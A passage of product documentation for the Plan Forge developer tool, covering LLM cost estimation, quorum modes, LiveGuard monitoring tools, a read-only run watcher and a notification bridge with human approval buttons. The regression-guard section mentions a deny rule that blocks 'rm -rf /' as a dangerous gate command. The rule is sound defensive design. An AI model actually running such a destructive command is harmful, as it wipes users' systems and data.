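  const cached = tokens.cachedInput ?? 0;            // input tokens served from cache
  const freshInput = tokens.input - cached;          // input tokens billed at full rate
  const cacheMultiplier = rates.cacheReadMultiplier ?? 1.0;
  const inputUsd = (freshInput / 1e6) * rates.inputPerM;
  const cachedUsd = (cached / 1e6) * rates.inputPerM * cacheMultiplier;
  const outputUsd = (tokens.output / 1e6) * rates.outputPerM;
  return inputUsd + cachedUsd + outputUsd;
}

// Rates taken from the "Model tier" row above (USD per 1M tokens).
const flagship = { inputPerM: 5, outputPerM: 25, cacheReadMultiplier: 0.1 };
const nano = { inputPerM: 0.05, outputPerM: 0.4 };

const call = { input: 40000, output: 6000, cachedInput: 0 };
const flagshipUsd = estimateCallUsd(call, flagship); // about 0.35
const nanoUsd = estimateCallUsd(call, nano);         // about 0.0044
```

This is only the base-rate arithmetic. For real projections, forge_estimate_quorum remains the source to read from, since it also accounts for quorum panels and the other multipliers.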
Before running a plan, get a projection. After running, audit the actual.
forge_estimate_quorum
// MCP
forge_estimate_quorum({ plan: "docs/plans/Phase-NN.md" })
// REST
POST /api/tool/forge_estimate_quorum
{ "plan": "docs/plans/Phase-NN.md" }
// CLI
pforge run-plan --estimate docs/plans/Phase-NN.md
Returns a per-slice token projection plus four-mode totals:
{
"plan": "Phase-NN",
"slices": [
{ "n": 1, "name": "Add user_profiles table", "projectedTokens": 8400, "modelTier": "mid", … },
…
],
"modes": {
"auto": { "totalUsd": 0.42, "breakdown": { /* per-model */ } },
"power": { "totalUsd": 1.85, "breakdown": { /* per-model */ } },
"speed": { "totalUsd": 0.18, "breakdown": { /* per-model */ } },
"disabled": { "totalUsd": 0.09, "breakdown": { /* per-model */ } }
}
}
The picker UI in the dashboard uses exactly this payload. If you're building your own UI, populate it the same way: the four-mode table is the single source of truth for "what does this cost?"
forge_cost_report
// MCP
forge_cost_report({ runId: "run-2026-05-18-091234" }) // one run
forge_cost_report({ scope: "month" }) // current month
forge_cost_report({ scope: "month", groupBy: "model" }) // monthly by model
// REST
GET /api/cost/report?runId=…
GET /api/cost/report?scope=month&groupBy=model
Returns the actual provider-billable amounts pulled from .forge/cost-history.json. Group by model, role, day, or slice. For runs that included xAI calls, the dollar amounts use the provider's exact-cost ticks (1 tick = $1×10⁻¹⁰) rather than multiplier math, so what you see is what xAI billed.
Quorum mode is the biggest single cost lever after model tier. Plan Forge ships four modes:
| Mode | Panel | Threshold | Cost shape | When |
|---|---|---|---|---|
| auto (default) | Dynamic: 2–3 models picked by intent class | Majority of responders | ~3× single-model | Most plans. Cost-effective and adequate for most decisions. |
| power | 4–5 flagship models (Opus, GPT-5.5, Gemini Pro, Grok 4.x) | 5 | ~8–12× single-model | Architectural decisions, plan hardening (Session 1), high-stakes refactors. |
| speed | 4–7 fast / cheap models (mini / nano tier) | 7 | ~1.5–3× single-model | High-volume CI runs, batch classifications, when latency > depth. |
| disabled (--no-quorum) | 1 model | n/a | 1× (baseline) | Solo dev, trivial slices, dev-loop iteration. |
forge_estimate_quorum, never from chat math. The ratios above are approximate and shift with model availability; the tool always returns current numbers.
Patterns that have been observed to reduce spend without hurting outcomes.
A slice that costs $0.50 to succeed is dramatically cheaper than one that costs $3 to fail and $2 to retry. The smaller the slice, the higher the first-pass success rate and the lower the total cost. The Crucible's plan-hardening pass (Session 1) is designed to split slices that are too fat; trust it. Target: 1–4 files per slice, 1 conceptual change per slice.
The auto mode classifies each slice into "search-like" / "transform-like" / "reason-like" and routes to a model tier accordingly. Hardcoding a flagship via --model often costs 10× more for no measurable quality gain on routine slices.
Loose gates pass bad work; bad work triggers retries; retries cost money. Strict, fast-to-execute gates (the Inner Loop, reviewer calibration target ~90–95% precision) catch failures on the first attempt and avoid the retry tax. The Inner Loop's forge_validate and forge_sweep are designed for exactly this trade.
Provider caches give 10× savings on cached input. Plan Forge keeps the system block, scope contract, and slice instructions stable across slices in a run, so providers cache the prefix automatically. Restarting the orchestrator between slices throws this away. Run plans end-to-end when you can.
power mode at the wrong moment is the most common over-spend. Reserve it for: plan hardening (Session 1), architectural decisions, slices flagged with high blast radius. Routine execution, even of moderately complex slices, works fine on auto or disabled.
Plan Forge's economic story is your bill stays yours. Concretely:
| Commitment | What it means |
|---|---|
| BYOK across providers | Anthropic, OpenAI, Google, xAI, Azure OpenAI: same code path, your keys. Switch providers by changing env vars; no migration tool needed. |
| No proxy layer | The orchestrator calls the provider's public API directly. There is no Plan Forge endpoint in the data path. Outage isolation: Plan Forge can't take you down, only your provider can. |
| No usage telemetry | Plan Forge does not phone home with your token counts. The cost history lives in .forge/cost-history.json on your machine and stays there unless you explicitly export it. |
| Symmetric provider treatment | Adding a new provider takes ~30 lines in pforge-mcp/cost-service.mjs + a route adapter. No provider is privileged; the pricing table is open-source. |
| Open-source pricing table | MODEL_PRICING is in the repo with _source URLs. If you don't believe a rate, click the source. If a rate is wrong, file a PR. |
| Easy export | forge_cost_report exports JSON or CSV. Your run history is portable to any BI tool. No data lock-in. |
| Skill / plan files are portable | SKILL.md and plan markdown are vendor-neutral text. Moving to a different agent runtime (Claude Code, Cursor, raw API scripts) preserves your investment. |
For teams or CI use, forge_cost_report aggregates roll up cleanly. Group by the dimension you want to forecast against and feed the result into your spreadsheet, BI tool, or dashboard of choice:
# Monthly spend by model
GET /api/cost/report?scope=month&groupBy=model
# Per-run breakdown (granular: every LLM call)
GET /api/cost/report?runId=run-2026-05-18-091234
# Current-month rollup by role (worker vs reviewer vs quorum vs forge-master)
GET /api/cost/report?scope=month&groupBy=role
Records come straight out of .forge/cost-history.json, one row per LLM call, with run id, slice, role, model, token counts, and dollar amount (or xAI ticks). The file is plain JSONL; you can pipe it through jq, import to DuckDB, or load to a spreadsheet without going through the API. Plan Forge does not enforce budgets, send alerts, or phone provider invoices. The data is yours; the policy is yours.
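Because the history is line-delimited JSON, a rollup outside the API is a few lines of code. The sketch below groups dollar amounts by any record field. The field names `model`, `role`, and `usd` are assumptions about the record layout, chosen for illustration; check a real record before relying on them.

```javascript
// Sketch: roll up cost records by an arbitrary field, given JSONL text.
// ASSUMPTION: each record has a numeric "usd" field and a string field
// named by `groupBy` (for example "model" or "role").
function rollupUsd(jsonlText, groupBy) {
  const totals = {};
  for (const line of jsonlText.split("\n")) {
    if (line.trim() === "") continue;           // skip blank lines
    const record = JSON.parse(line);            // one JSON object per line
    const key = String(record[groupBy]);
    totals[key] = (totals[key] ?? 0) + record.usd;
  }
  return totals;
}

// Usage with inline sample data (values are made up for the example).
const sampleHistory = [
  '{"model":"model-a","role":"worker","usd":0.25}',
  '{"model":"model-a","role":"reviewer","usd":0.5}',
  '{"model":"model-b","role":"worker","usd":1}',
].join("\n");
const byModel = rollupUsd(sampleHistory, "model");
```

Taking the text as a string keeps the function independent of how the file is read, so the same code works on a file, a pipe, or an export.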
From the recent v3.6.2 manual-completion phase, slice B5 (ship REST API reference appendix):
| Item | Value |
|---|---|
| Mode | auto quorum, 3 models on hardening, 1 model on execution |
| Files touched | 10 (1 new, 9 modified) |
| Worker input tokens | ~42,000 (system + scope + 9 referenced files at ~3K each) |
| Worker output tokens | ~6,400 (mostly the new rest-api-reference.html) |
| Cache hit on system block | Yes (Anthropic, 0.10× on ~3,200 cached tokens) |
| Validation passes | 2 (one failed on broken cross-refs, ~5K extra worker tokens to fix) |
| Total provider spend | ~$0.78 |
| Equivalent power mode estimate | ~$6.20 (8× multiplier) |
| Equivalent disabled estimate | ~$0.26 (single model, but expected reduction in reviewer-catch rate raised retry risk; auto was the right pick) |
The lesson: auto mode with right-sized slices and tight gates kept a 600-line appendix delivery under a dollar. The estimator predicted $0.71; actual was $0.78, a 10% miss attributable to the second validation pass, which the estimator does not yet model.
.forge.json modelRouting: default model selection that drives per-slice cost.
.forge.json quorum: threshold and mode that govern panel size.
The forge builds your software. LiveGuard watches the gates after it ships.
Plan Forge sessions end when the code ships. The forge hardens your plan, executes your slices, and pushes a clean commit. Then it stops, because that's the right boundary for a build-time tool.
But software doesn't stop when the build does. Secrets drift into environment variables. Dependencies acquire CVEs. Configuration diverges between environments. The regression gate you wrote last month no longer covers the new payment flow. None of these are build-time failures; they're post-coding failures. And without a watch on the gates, they grow silently until they become incidents.
LiveGuard is what watches after the forge stops.
LiveGuard doesn't just observe, it learns. Every finding feeds back into the system:
forge_hotspot) are tested first by the regression guard. Risk-based testing: test the code most likely to break.
.forge/health-dna.json for cross-session decay detection.
LiveGuard occupies the operational phase, after code is shipped but before (and alongside) production APM:
The forge pipeline (Chapters 1–14) covers everything left of the arrow. LiveGuard picks up at the right.
LiveGuard is not an APM (Application Performance Monitoring) system. It doesn't instrument your production runtime, collect request traces, or measure p99 latency. Tools like Datadog, New Relic, and Application Insights already do that well.
LiveGuard operates at the project level, not the request level. It watches your codebase, your environment files, your dependency tree, and your deployment history: the things that change between builds, not between HTTP requests. Think of it as a quality gate that stays active between coding sessions.
In the forge metaphor, the build pipeline is the smith: it shapes raw material into a finished product. LiveGuard is the guardian posted at the gate after the smith finishes. The guardian doesn't shape the metal; it watches for cracks, drift, and intrusions that appear over time.
Each LiveGuard tool is a different kind of watch:
forge_drift_report
forge_incident_capture
forge_dep_watch
forge_regression_guard
forge_hotspot
forge_secret_scan
forge_env_diff
LiveGuard tools are designed for four trigger points:
| When | Tools to Run | Why |
|---|---|---|
| After every plan execution | forge_drift_report, forge_regression_guard | Catch architecture drift while context is fresh |
| Before a deploy | forge_secret_scan, forge_env_diff, forge_dep_watch | Block secrets, missing env keys, and new CVEs from reaching production |
| On a schedule (daily / weekly) | forge_health_trend, forge_alert_triage, forge_hotspot | Trend analysis and prioritized alert review |
| After an incident | forge_incident_capture, forge_runbook | Record the incident and generate a response runbook |
In v2.29, lifecycle hooks automate this: PreDeploy runs secret scan and env diff automatically before any deploy command, and PostSlice runs drift analysis after every commit.
14 post-coding intelligence tools. Each guards a different gate.
All 14 LiveGuard tools are available as MCP tools and via REST API. Full reference per tool below.
| Tool | What It Guards | Since |
|---|---|---|
| forge_drift_report | Architecture drift vs. plan | v2.27 |
| forge_incident_capture | Incident log + MTTR tracking | v2.27 |
| forge_dep_watch | Dependency vulnerability changes | v2.27 |
| forge_regression_guard | Regression gate pass/fail history | v2.27 |
| forge_runbook | Operational runbook store | v2.27 |
| forge_hotspot | High-churn / high-failure files | v2.27 |
| forge_health_trend | Long-term health + MTTBF trending | v2.27 |
| forge_alert_triage | Ranked cross-signal alert list | v2.27 |
| forge_deploy_journal | Deploy log with pre/post health | v2.27 |
| forge_secret_scan | High-entropy secret detection in diffs | v2.28 |
| forge_env_diff | Environment variable key divergence | v2.28 |
| forge_fix_proposal | Scoped fix plan from regression/drift/incident/secret failure, human-approved only | v2.29 |
| forge_quorum_analyze | Structured quorum prompt assembly from LiveGuard data, no LLM calls in server | v2.29 |
| forge_liveguard_run | Composite health check, runs all LiveGuard tools in one call, returns unified green/yellow/red status | v2.30 |
All 14 LiveGuard tools ship in the default install.
Scores the codebase against architecture guardrail rules from instruction files. Tracks drift over time in .forge/drift-history.json. Fires a bridge notification when the score drops below the configured threshold.
pforge drift [--since <ref>]
| Option | Default | Description |
|---|---|---|
| --since | HEAD~5 | Git ref for comparison baseline |
| --threshold | 70 | Score below which a bridge notification fires |
Output: { score, delta, violations[], timestamp }. Score is 0–100; higher is better. delta is the change since the previous run.
Records incidents with severity, affected files, and MTTR tracking. Dispatches on-call notification via the .forge.json onCall config if present.
pforge incident "<description>" [--severity critical|high|medium|low] [--files f1,f2] [--resolved-at ISO]
pforge triage # list ranked open alerts (incidents + drift violations)
| Option | Default | Description |
|---|---|---|
| severity | medium | One of: critical, high, medium, low |
| files | [] | Affected file paths |
| description | — | Human-readable incident description |
Output: { incidentId, severity, mttr, onCallNotified, storedAt }. Incidents are appended to .forge/incidents.jsonl (one JSON record per line).
Scans dependencies for CVEs using npm audit. Compares against a previous snapshot in .forge/deps-snapshot.json. Alerts on new vulnerabilities only; unchanged findings are suppressed.
pforge dep-watch
Output: { newVulnerabilities[], resolvedVulnerabilities[], unchanged, snapshot }. Fires a dep-vulnerability hub event when new CVEs appear.
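The snapshot comparison described above is essentially a set difference. A minimal sketch follows, assuming each vulnerability can be reduced to a stable identifier string (for example an advisory ID) and that `unchanged` is a count. Both are assumptions; the real tool's snapshot format is not shown here.

```javascript
// Sketch: compare two lists of vulnerability identifiers.
// ASSUMPTION: findings are keyed by a stable string ID, and "unchanged"
// is reported as a count rather than a list.
function diffVulnerabilities(previousIds, currentIds) {
  const prev = new Set(previousIds);
  const curr = new Set(currentIds);
  return {
    newVulnerabilities: [...curr].filter((id) => !prev.has(id)),
    resolvedVulnerabilities: [...prev].filter((id) => !curr.has(id)),
    unchanged: [...curr].filter((id) => prev.has(id)).length,
  };
}

// Usage: only "ADV-3" would trigger an alert; "ADV-2" is suppressed as unchanged.
const depDiff = diffVulnerabilities(["ADV-1", "ADV-2"], ["ADV-2", "ADV-3"]);
```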
Extracts validation gate commands from plan files, executes them against the codebase, and reports pass/fail/blocked results. Used by the PostSlice hook and manually after refactors.
pforge regression-guard [--plan <plan-file>]
| Option | Default | Description |
|---|---|---|
| --plan | all plans in docs/plans/ | Specific plan file to check gates for |
Output: { gates[], passed, failed, blocked, summary }. Commands are allow-listed via GATE_ALLOWED_PREFIXES; dangerous patterns like rm -rf / are blocked.
Generates a human-readable operational runbook from a hardened plan file. Optionally appends recent incidents for context. Saves to .forge/runbooks/.
pforge runbook <plan-file> # generate a runbook from a hardened plan
Naming: Plan filename → lowercase → non-[a-z0-9-] replaced with hyphens → collapse → append -runbook.md.
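The naming rule can be sketched as a short chain of string transforms. This is an illustration of the rule as stated, not the tool's own code. In particular, stripping the plan's `.md` extension before slugging is an assumption, and `runbookName` is a hypothetical name.

```javascript
// Sketch of the naming rule above. ASSUMPTION: the plan's ".md" extension
// is dropped before the other steps; the real tool may differ.
function runbookName(planFilename) {
  const slug = planFilename
    .replace(/\.md$/i, "")         // assumption: drop the extension first
    .toLowerCase()                 // lowercase
    .replace(/[^a-z0-9-]/g, "-")   // non-[a-z0-9-] replaced with hyphens
    .replace(/-+/g, "-");          // collapse runs of hyphens
  return slug + "-runbook.md";     // append the suffix
}

// Usage
const runbookFile = runbookName("Phase-12 User Profiles.md");
// runbookFile === "phase-12-user-profiles-runbook.md"
```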
Identifies git churn hotspots: files that change most frequently. Uses a 24-hour cache to avoid repeated git log queries.
pforge hotspot [--top 10] [--since 30d]
| Option | Default | Description |
|---|---|---|
| --top | 10 | Number of hotspot files to return |
| --since | 30d | Time window for churn analysis |
Output: { hotspots[{ file, changeCount, lastChanged }], since, cachedUntil }.
Aggregates drift scores, cost history, incident frequency, model performance, and test pass rates over a configurable time window. Returns an overall health score 0–100 plus a Health DNA fingerprint for decay detection.
pforge health-trend [--window 30d]
Output: { healthScore, drift, cost, incidents, models, tests, healthDNA }.
Health DNA (.forge/health-dna.json): Composite fingerprint of driftAvg, incidentRate, testPassRate, modelSuccessRate, and costPerSlice. Compare across time to detect project decay before it manifests as bugs.
Reads incidents and drift violations, ranks by priority (severity × recency), and returns a prioritized list. Read-only, never modifies data.
pforge alert-triage
Output: { alerts[{ source, severity, priority, description, timestamp }], totalAlerts }. Priority is a computed score, higher means "address first".
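One way to read "severity × recency" is a severity weight multiplied by a factor that decays with age. The sketch below shows that shape only. The weights, the 7-day half-life, and the function names are hypothetical, since the manual does not specify the actual formula.

```javascript
// Sketch: priority = severity weight × recency factor.
// ASSUMPTION: the weights and the 7-day half-life are invented for
// illustration; the real scoring may use a different formula.
const SEVERITY_WEIGHT = { critical: 4, high: 3, medium: 2, low: 1 };
const HALF_LIFE_MS = 7 * 24 * 60 * 60 * 1000;

function priorityOf(alert, nowMs) {
  const ageMs = Math.max(0, nowMs - Date.parse(alert.timestamp));
  const recency = Math.pow(0.5, ageMs / HALF_LIFE_MS); // 1.0 when brand new
  return SEVERITY_WEIGHT[alert.severity] * recency;
}

// Returns a new array sorted so that higher priority comes first.
function triage(alerts, nowMs) {
  return alerts
    .map((a) => ({ ...a, priority: priorityOf(a, nowMs) }))
    .sort((x, y) => y.priority - x.priority);
}
```

With these made-up weights, a fresh medium alert (2 × 1.0) outranks a two-week-old critical one (4 × 0.25), which is the kind of trade-off a recency term introduces.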
Records deployments with version, deployer, notes, and an optional slice reference. Correlates with forge_incident_capture so incidents can be linked to the deploy that introduced them.
pforge deploy-log [--tag <tag>] [--notes "..."]
Output: { deployId, version, deployer, timestamp, notes }. Stored in .forge/deploy-journal.jsonl.
Scans git diff output for high-entropy strings using Shannon entropy analysis. Never logs actual secret values; all findings are masked to <REDACTED> in output, cache, and telemetry.
pforge secret-scan [--since HEAD~1] [--threshold 4.0]
| Option | Default | Description |
|---|---|---|
| --since | HEAD~1 | Git ref to diff against |
| --threshold | 4.0 | Shannon entropy threshold (higher = fewer but more confident findings) |
Output:
{
"scannedAt": "2026-04-13T...",
"since": "HEAD~1",
"threshold": 4.0,
"scannedFiles": 5,
"clean": false,
"findings": [{
"file": "src/config.js",
"line": 5,
"type": "api_key",
"entropyScore": 4.8,
"masked": "<REDACTED>",
"confidence": "high"
}]
}
.forge/secret-scan-cache.json) stores only file paths, line numbers, entropy scores, and <REDACTED> placeholders. If git is unavailable, the tool degrades gracefully with { clean: null, scannedFiles: 0 }. May annotate .forge/deploy-journal-meta.json sidecar with scan results.
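For readers unfamiliar with the metric, Shannon entropy over a string's characters can be computed as below. This is a generic sketch of the measure, not the scanner's code. The helper `looksLikeSecret` and its use of `>=` against the threshold are assumptions.

```javascript
// Shannon entropy in bits per character: H = -sum(p * log2(p)) over the
// distinct characters of the string.
function shannonEntropy(text) {
  const chars = [...text];
  if (chars.length === 0) return 0;
  const counts = new Map();
  for (const ch of chars) counts.set(ch, (counts.get(ch) ?? 0) + 1);
  let bits = 0;
  for (const n of counts.values()) {
    const p = n / chars.length;
    bits -= p * Math.log2(p);
  }
  return bits;
}

// ASSUMPTION: a token is flagged when its entropy meets or exceeds the
// threshold; the real comparison may be strict.
function looksLikeSecret(token, threshold = 4.0) {
  return shannonEntropy(token) >= threshold;
}
```

A string of 16 distinct characters scores exactly 4.0 bits, while English words and repeated characters score much lower, which is why raising the threshold yields fewer findings.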
Compares environment variable key names across .env files. Identifies keys present in the baseline but missing in targets (and vice versa). Never reads, logs, or caches environment variable values.
pforge env-diff [--baseline .env] [--files .env.staging,.env.production]
| Option | Default | Description |
|---|---|---|
| --baseline | .env | The reference environment file |
| --files | .env.* | Comma-separated target files to compare |
Output:
{
"scannedAt": "2026-04-13T...",
"baseline": ".env",
"filesCompared": 2,
"pairs": [{
"file": ".env.staging",
"missingInTarget": ["STRIPE_KEY"],
"missingInBaseline": []
}],
"summary": { "clean": false, "totalGaps": 1, "baselineKeyCount": 12 }
}
.forge/env-diff-cache.json) stores key names only. Values are never read from the environment files; the parser extracts the key portion of each KEY=value line and discards the rest.
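The key-only comparison can be sketched as follows. It assumes plain `KEY=value` lines with `#` comments and does not handle variants such as an `export` prefix. The function names are hypothetical, while the output field names follow the example payload above.

```javascript
// Sketch: extract key names from .env text without retaining any values.
// ASSUMPTION: plain KEY=value lines; "#" starts a comment line.
function extractKeys(envText) {
  const keys = new Set();
  for (const rawLine of envText.split(/\r?\n/)) {
    const line = rawLine.trim();
    if (line === "" || line.startsWith("#")) continue;
    const eq = line.indexOf("=");
    if (eq <= 0) continue;               // no key before "=": skip
    keys.add(line.slice(0, eq).trim());  // keep the key, discard the rest
  }
  return keys;
}

function diffKeys(baselineText, targetText) {
  const base = extractKeys(baselineText);
  const target = extractKeys(targetText);
  return {
    missingInTarget: [...base].filter((k) => !target.has(k)),
    missingInBaseline: [...target].filter((k) => !base.has(k)),
  };
}
```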
LiveGuard tools read configuration from .forge.json at project root. Below are the root-level fields relevant to LiveGuard.
| Field | Type | Description |
|---|---|---|
| bridge | object | Bridge configuration: url (string), approvalSecret (string). Used for webhook notifications and approval gates. |
| model | string | Default AI model for plan execution (e.g., "claude-sonnet-4.6"). |
| onCall | object | On-call routing for incident notifications. name (string, required): person or team name. channel (string, required): notification channel ID or webhook. escalation (string, optional): escalation target if primary is unavailable. |
| hooks | object | Lifecycle hook configuration: preDeploy, postSlice, preAgentHandoff. See v2.29 for details. |
| openclaw | object | OpenClaw analytics bridge: endpoint (string), apiKey (string, see .forge/secrets.json). |
Example .forge.json with LiveGuard fields:
{
"bridge": { "url": "https://hooks.slack.com/...", "approvalSecret": "..." },
"model": "claude-sonnet-4.6",
"onCall": { "name": "Platform Team", "channel": "#incidents", "escalation": "eng-lead" },
"hooks": {
"preDeploy": { "enabled": true },
"postSlice": { "enabled": true },
"preAgentHandoff": { "enabled": true }
},
"openclaw": { "endpoint": "https://your-openclaw-instance" }
}
forge_smith checks onCall: if the field exists, it verifies that both name and channel are present and emits a warning (not an error) if either is missing.
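The check described above amounts to the following logic. This is a sketch of the stated behavior, not forge_smith's source. The function name and the warning text are made up for the example.

```javascript
// Sketch: warn (never throw) when onCall exists but lacks name or channel.
// Hypothetical helper; warning wording is illustrative.
function checkOnCall(config) {
  const warnings = [];
  if (config.onCall == null) return warnings;  // field absent: nothing to check
  for (const field of ["name", "channel"]) {
    const value = config.onCall[field];
    if (typeof value !== "string" || value.trim() === "") {
      warnings.push(`onCall.${field} is missing`);
    }
  }
  return warnings;
}

// Usage: escalation is optional, so only the missing channel is reported.
const onCallWarnings = checkOnCall({ onCall: { name: "Platform Team", escalation: "eng-lead" } });
```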
The same unified dashboard, extended with a LIVEGUARD section: 7 real-time tabs driven by WebSocket hub events.
forge_liveguard_run composite results are displayed inline.
The LiveGuard section is part of the unified Plan Forge dashboard; no separate app or port is required:
node pforge-mcp/server.mjs
Open localhost:3100/dashboard. The LIVEGUARD section appears in the tab bar after a visual divider, separated from the FORGE section.
The tab bar uses a two-section layout:
FORGE tabs use a blue active indicator. LIVEGUARD tabs use amber, so you always know which half of the dashboard you're in.
The Health tab shows aggregate project health powered by forge_health_trend. Key widgets:
forge_cost_report.
The Health tab auto-refreshes on every liveguard-tool-completed WebSocket event. No manual refresh needed.
Live list of open incidents from .forge/incidents.jsonl. Each card shows:
.forge.json onCall config
Fix Proposals Feed: when forge_fix_proposal has generated plans, a Proposed Fixes section appears at the top of the Incidents tab. Each entry shows the proposal file path, source type (regression/drift/incident/secret), and a Run in Assisted Mode → button that opens the Actions tab pre-filled with the plan path. The feed reads from GET /api/fix/proposals on tab load and on every fix-proposal-ready hub event.
Displays the output of forge_alert_triage, a ranked list of all open alerts sorted by priority (severity × recency). Each row shows:
Critical and high alerts show a red/amber left-border on their row. The tab badge shows the total number of unresolved critical+high alerts.
Surfaces results from forge_secret_scan. Shows:
<REDACTED> placeholders.
POST /api/secrets/scan
The Security tab reads from .forge/secret-scan-cache.json on load and refreshes on liveguard-tool-completed events where tool === "forge_secret_scan".
Key-by-key comparison of all .env.* files in the project root, powered by forge_env_diff.
POST /api/env/diff
The tab reads from .forge/env-diff-cache.json on load. Cache is refreshed when forge_env_diff completes.
The Health and Incidents tabs each include a Run Quorum Analysis → link. Clicking it calls GET /api/quorum/prompt?source=<tab-source>&goal=risk-assess and opens a pre-populated quorum prompt in the Actions tab, ready to copy into your AI client. No model calls happen from the dashboard; it only assembles the prompt for you.
Each LiveGuard tab header includes a Docs ↗ link. Clicking it opens this chapter in a new tab, so you never lose your live dashboard session. The section header also has a Docs link pointing to this page's overview.
A second pair of eyes on a running forge. Read-only by design.
When you execute a long plan (pforge run-plan) the executor session is focused on one thing: building the next slice. It's not a good place to also answer "how's it going?" for a second human, or to notice anomaly patterns across multiple runs. The Watcher is the operational counterpart: it tails the run, reads event streams, and summarizes state.
Two modes, one tool:
forge_watch), file-reads only, zero AI cost. Returns slice counts, token usage, gate errors, anomalies.
forge_watch with mode=analyze), invokes a frontier model (default claude-opus-4.7) to produce narrative advice from the snapshot.
forge_watch_live
For near-live observation, forge_watch_live tails the event stream for a bounded window:
.forge/server-ports.json).
events.log when the hub isn't up.
forge_watch {
targetPath: "E:/GitHub/Rummag",
mode: "snapshot"
}
forge_watch_live {
targetPath: "E:/GitHub/Rummag",
durationMs: 30000
}
The snapshot watcher runs heuristic rules over the run state and surfaces anomalies automatically. Examples:
review-queue-backlog: independent reviewer slices piling up.
tempering-run-failed: a Tempering run returned non-zero.
mutationBelowMinimum / flakyCount / perfRegressionCount: Tempering quality thresholds breached.
Anomalies are emitted as watch-anomaly-detected hub events and appear in the dashboard's Watcher tab.
When recordHistory=true (the default in v2.35+), each snapshot is appended to the Watcher session's own .forge/watch-history.jsonl, never the target's. Pair with sinceTimestamp (pass the previous report's cursor) for gap-free continuous monitoring across multiple invocations.
The dashboard's Watcher tab consumes two event types:
watch-snapshot-completed: emitted when forge_watch builds a snapshot.
watch-anomaly-detected: emitted when one or more anomaly rules fire.
Chip rows surface Tempering state, Crucible funnel state, and a Home chip showing in-flight runs / open incidents / open bugs, all without touching the target project.
.forge/runs/<runId>/ and emits events to its own hub. History writes go only to the Watcher's cwd. Verified by the read-only subscriber test in pforge-mcp/tests/.
A natural pairing: the Watcher runs headless on a long run, and the Remote Bridge (Chapter 20) forwards hub events to Telegram, Slack, Discord, or OpenClaw so you can check progress from your phone. The Watcher never pushes; it just observes. The Remote Bridge decides what to surface.
Forward hub events off-box. Approve slices from your phone. One config, four channels.
551b850, 5b5a8e7; extended in later phases). Six channels supported out of the box: Telegram, Slack, Discord, Microsoft Teams, PagerDuty, and OpenClaw (Slack / Teams / PagerDuty / Email also ship as installable notify-* extensions under extensions/). Generic webhook routing, per-channel rate limits, and a live config watcher on the dashboard's Notifications subtab.
Plan Forge runs inside your IDE, but some decisions are not IDE-shaped. A reviewer flagged a drift anomaly at 2 AM. A quorum tie needs a human tiebreaker. An incident fired after you closed the laptop. The Remote Bridge forwards hub events to the places you already have notifications (Telegram, Slack, Discord) and supports inline approval / reject flows for the events that need a human.
| Channel | Best for | Approval flow |
|---|---|---|
| Telegram | Solo devs, inline buttons on your phone | ✓ Inline buttons (approve / reject) |
| Slack | Team channels, rich attachments, threading | ✓ Block Kit buttons |
| Discord | Community + OSS projects, embeds | ⚠ Message-based (no inline buttons) |
| OpenClaw | Agent-to-agent coordination | ✓ Handoff contract |
Every hub event carries a channels array. A single event can fan out to multiple destinations:
{
"type": "drift-alert",
"severity": "high",
"channels": ["telegram", "slack"],
"summary": "Drift score dropped from 91 → 62 after slice 04.2",
"approval": {
"required": true,
"options": ["continue", "pause", "rollback"]
}
}
Routing is driven by a channels filter on severity and event type. High-severity LiveGuard events (secret found, env key mismatch, drift score below threshold) route by default; informational snapshots do not.
For events with approval.required=true, the bridge renders interactive buttons (where the channel supports them). When a user clicks a button, the response flows back into the hub as an approval-response event with {channel, platform, user, decision, timestamp}. The orchestrator consumes that event to resume, pause, or roll back the run.
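A consumer of the approval-response event would typically check the decision against the options that were offered before acting on it. The sketch below shows that validation step only. The function name and the returned shape are hypothetical, and the event fields are the ones named above.

```javascript
// Sketch: validate an approval-response against the originating request.
// Hypothetical helper; the orchestrator's real handling is not shown in
// this manual.
function resolveDecision(requestEvent, responseEvent) {
  const options = requestEvent.approval?.options ?? [];
  if (!options.includes(responseEvent.decision)) {
    return { accepted: false, reason: "decision not among offered options" };
  }
  return {
    accepted: true,
    action: responseEvent.decision,  // e.g. "continue", "pause", "rollback"
    by: responseEvent.user,
    via: responseEvent.channel,
  };
}

// Usage with the drift-alert options shown earlier in this chapter.
const approvalRequest = { approval: { required: true, options: ["continue", "pause", "rollback"] } };
const approvalOutcome = resolveDecision(approvalRequest, {
  channel: "telegram", platform: "telegram", user: "alice",
  decision: "pause", timestamp: "2026-04-13T02:00:00Z",
});
```

Rejecting unknown decisions keeps a stale or malformed button click from steering a run.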
551b850) that queues overflow and drops low-severity events when saturated, never high-severity ones.
Credentials live in .forge/secrets.json (gitignored). The bridge config itself is in .forge.json under remoteBridge:
{
"remoteBridge": {
"enabled": true,
"channels": {
"telegram": {
"chatId": "-1001234567890",
"severityFloor": "medium"
},
"slack": {
"webhookPath": "slack-ops",
"severityFloor": "high"
}
},
"rateLimits": {
"telegram": { "perSecond": 30 },
"slack": { "perSecond": 1 }
}
}
}
Secrets (TELEGRAM_BOT_TOKEN, SLACK_SIGNING_SECRET, DISCORD_WEBHOOK_URL, etc.) stay out of git via the standard .forge/secrets.json scheme documented in the Guard station reference.
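To illustrate how a per-channel severityFloor could filter an event's channels array, here is a minimal sketch against the config shape shown above. The ordering low < medium < high < critical, the default floor of "low", and the function name `routeEvent` are assumptions, not documented behavior.

```javascript
// Sketch: pick the channels an event should reach, given remoteBridge config.
// ASSUMPTION: severity ordering and the default floor are illustrative.
const SEVERITY_RANK = { low: 0, medium: 1, high: 2, critical: 3 };

function routeEvent(event, bridgeConfig) {
  if (!bridgeConfig.enabled) return [];
  return (event.channels ?? []).filter((name) => {
    const channel = bridgeConfig.channels[name];
    if (!channel) return false;                   // channel not configured
    const floor = channel.severityFloor ?? "low"; // assumed default
    return SEVERITY_RANK[event.severity] >= SEVERITY_RANK[floor];
  });
}

// Usage with the example config from this section.
const bridgeConfig = {
  enabled: true,
  channels: {
    telegram: { chatId: "-1001234567890", severityFloor: "medium" },
    slack: { webhookPath: "slack-ops", severityFloor: "high" },
  },
};
const mediumTargets = routeEvent({ severity: "medium", channels: ["telegram", "slack"] }, bridgeConfig);
const highTargets = routeEvent({ severity: "high", channels: ["telegram", "slack"] }, bridgeConfig);
```

Under these assumptions a medium event reaches only Telegram, while a high event reaches both channels.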
The dashboard's Config → Notifications subtab (shipped 5b5a8e7) gives you:
remote-test event).
.forge.json reload without restart.
